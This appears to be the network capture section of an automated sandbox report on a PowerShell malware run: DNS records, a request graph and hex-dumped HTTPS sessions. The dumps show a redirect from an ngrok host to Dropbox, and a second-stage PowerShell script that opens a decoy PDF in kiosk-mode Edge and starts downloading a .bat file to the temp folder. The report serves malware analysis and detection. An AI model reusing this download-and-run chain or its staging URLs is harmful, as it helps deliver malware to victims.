                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.284162045 CET1.1.1.1192.168.2.60xb5f0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.284162045 CET1.1.1.1192.168.2.60xb5f0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.284600019 CET1.1.1.1192.168.2.60x686cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.713674068 CET1.1.1.1192.168.2.60xe742No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.713674068 CET1.1.1.1192.168.2.60xe742No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:30.714500904 CET1.1.1.1192.168.2.60x5f6bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.510029078 CET1.1.1.1192.168.2.60xc02No error (0)uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.510029078 CET1.1.1.1192.168.2.60xc02No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:38.662571907 CET1.1.1.1192.168.2.60x9d47No error (0)uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:38.662571907 CET1.1.1.1192.168.2.60x9d47No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:28.284225941 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:28.284225941 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:29.279028893 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:29.279028893 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:30.288233042 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:30.288233042 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:32.286071062 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:32.286071062 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:36.286026001 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:36.286026001 CET1.1.1.1192.168.2.60xf295No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC172.64.41.3192.168.2.60x0No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)true
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC172.64.41.3192.168.2.60x0No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)true

                                                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                        • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                                                        • www.dropbox.com
                                                                                                                                                                                                                                                                                                                        • uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        • ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        • ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                        • uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        • uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        0192.168.2.6497073.125.209.94443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:07 UTC230OUTGET /api/secure/220836f7ecc9edc92da5931044d3532a HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:09 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 395
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:09 GMT
                                                                                                                                                                                                                                                                                                                        Location: https://www.dropbox.com/scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&dl=1
                                                                                                                                                                                                                                                                                                                        Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:09 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 72 68 64 66 69 33 34 6b 7a 39 36 79 6e 37 36 76 65 6f 34 73 6f 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 6e 78 36 30 6a 35 73 69 69 6c 78 78 39 69 78 6a 32 77 34 31 79 30 33 65 63 26 61 6d 70 3b
                                                                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&amp;


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        1192.168.2.64970820.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6d 51 4b 6f 64 6d 62 56 6c 30 2b 73 4e 68 42 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 34 37 37 36 64 63 35 31 65 32 38 37 37 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: mQKodmbVl0+sNhB5.1Context: 944776dc51e2877d
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:10 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6d 51 4b 6f 64 6d 62 56 6c 30 2b 73 4e 68 42 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 34 37 37 36 64 63 35 31 65 32 38 37 37 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: mQKodmbVl0+sNhB5.2Context: 944776dc51e2877d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:10 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6d 51 4b 6f 64 6d 62 56 6c 30 2b 73 4e 68 42 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 34 37 37 36 64 63 35 31 65 32 38 37 37 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: mQKodmbVl0+sNhB5.3Context: 944776dc51e2877d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 41 59 36 6b 73 49 74 61 6b 69 66 4b 4d 77 47 67 49 59 69 6e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 1AY6ksItakifKMwGgIYing.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        2192.168.2.649709162.125.65.18443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:11 UTC236OUTGET /scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:12 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.c [TRUNCATED]
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Location: https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com/cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=1#
                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                        Set-Cookie: gvc=ODE5NDkzNTE5ODM3NzI0MjYwNTk1NzI0MzEzNTM0Nzk5ODE1NjY=; Path=/; Expires=Sun, 09 Dec 2029 17:40:11 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: t=LNj-6ws0A8vSrDoGY3f6Jnbx; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:11 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=LNj-6ws0A8vSrDoGY3f6Jnbx; Path=/; Expires=Wed, 10 Dec 2025 17:40:11 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-ss=zITgCVz_yU; Path=/; Expires=Wed, 10 Dec 2025 17:40:11 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:11 GMT
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:11 GMT
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 8819ba1204384485b8b4daafc826a702
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:12 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        3192.168.2.649710162.125.69.15443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:13 UTC370OUTGET /cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:14 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        Etag: 1733738004885292d
                                                                                                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Server-Response-Time: 192
                                                                                                                                                                                                                                                                                                                        X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:14 GMT
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 13cf6ed6248c4d6e93f61d1cc745780a
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:14 UTC411INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 69 63 33 71
                                                                                                                                                                                                                                                                                                                        Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/ic3q


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        4192.168.2.64972320.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 4d 32 55 34 71 57 51 34 55 75 56 70 55 6e 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 32 66 36 61 36 31 37 37 64 64 37 31 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: FM2U4qWQ4UuVpUny.1Context: ec12f6a6177dd711
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 46 4d 32 55 34 71 57 51 34 55 75 56 70 55 6e 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 32 66 36 61 36 31 37 37 64 64 37 31 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: FM2U4qWQ4UuVpUny.2Context: ec12f6a6177dd711<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 4d 32 55 34 71 57 51 34 55 75 56 70 55 6e 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 32 66 36 61 36 31 37 37 64 64 37 31 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: FM2U4qWQ4UuVpUny.3Context: ec12f6a6177dd711<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
